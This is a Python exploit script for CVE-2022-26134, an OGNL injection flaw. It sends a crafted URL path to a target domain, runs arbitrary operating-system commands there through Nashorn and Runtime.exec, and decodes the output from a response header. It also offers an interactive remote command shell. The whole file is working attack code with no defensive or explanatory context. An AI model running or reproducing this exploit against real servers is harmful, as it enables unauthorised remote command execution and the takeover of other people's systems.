cve-2022-26134.py

#!/usr/bin/env python3

import argparse
import cmd
import requests
import sys
import urllib.parse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

from base64 import urlsafe_b64decode

def build_chars(command):
    template = "var s='';var pp = java.lang.Runtime.getRuntime().exec('" + command + "').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())"
    return ",".join(list(map(lambda x: str(ord(x)), template)))

def rce(command):
    toinject = """${Class.forName("com"+".opensymphony"+".webwork"+".ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("CmdResponse",Class.forName("javax"+".script"+".ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode(""" + build_chars(command) + """))"))}"""

    toinject = urllib.parse.quote(toinject)
    return toinject

def get_res(base_url, command):
    inject = rce(command)
    r = requests.get(f"{base_url}/{inject}/", allow_redirects=False, verify=False)
    if 'CmdResponse' in r.headers.keys():
        return urlsafe_b64decode(r.headers['CmdResponse']).decode()
    else:
        return ''


class CVEShell(cmd.Cmd):
    intro = """
  _____________   _______________         _______________   ________ ________           ________  ____________________     _____  
  \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \\_____  \          \_____  \/  _____/_   \_____  \   /  |  | 
  /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/ /  ____/   ______  /  ____/   __  \ |   | _(__  <  /   |  |_
  \     \____\     /   |        \ /_____/ /       \  \_/   \/       \/       \  /_____/ /       \  |__\  \|   |/       \/    ^   /
   \______  / \___/   /_______  /         \_______ \_____  /\_______ \_______ \         \_______ \_____  /|___/______  /\____   | 
          \/                  \/                  \/     \/         \/       \/                 \/     \/            \/      |__| 
"""
    prompt = "> "
    base_url = ""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url

    def do_exit(self, line):
        'Exit the interactive shell'
        return True

    def do_help(self, line):
        print('Enter a command to run on the remote host or exit to quit')

    def default(self, line):
        'Enter a command to run on the remote host'
        print(get_res(self.base_url, line))


def main():
    parser = argparse.ArgumentParser(prog='cve-2022-26134')
    parser.add_argument('-i', '--interactive', action='store_true', help="Launch a non-persistent interactive shell")
    parser.add_argument('-s', '--use_https', action='store_true', help="Use https")
    parser.add_argument('domain', help="Domain to inject to")
    parser.add_argument('cmd', nargs="?", help="Command to run")
    args = parser.parse_args()

    protocol = "http"

    if args.use_https:
        protocol = "https"

    base_url = f"{protocol}://{args.domain}"
    
    if args.cmd == None and args.interactive == False:
        sys.stderr.write("[-] You must provide a command or use the --interactive option to run\n\n")
        parser.print_help()
        sys.exit(1)
    elif args.cmd != None:
        res = get_res(base_url, args.cmd)
        print(res)
    else:
        CVEShell(base_url).cmdloop()

if __name__ == "__main__":
    main()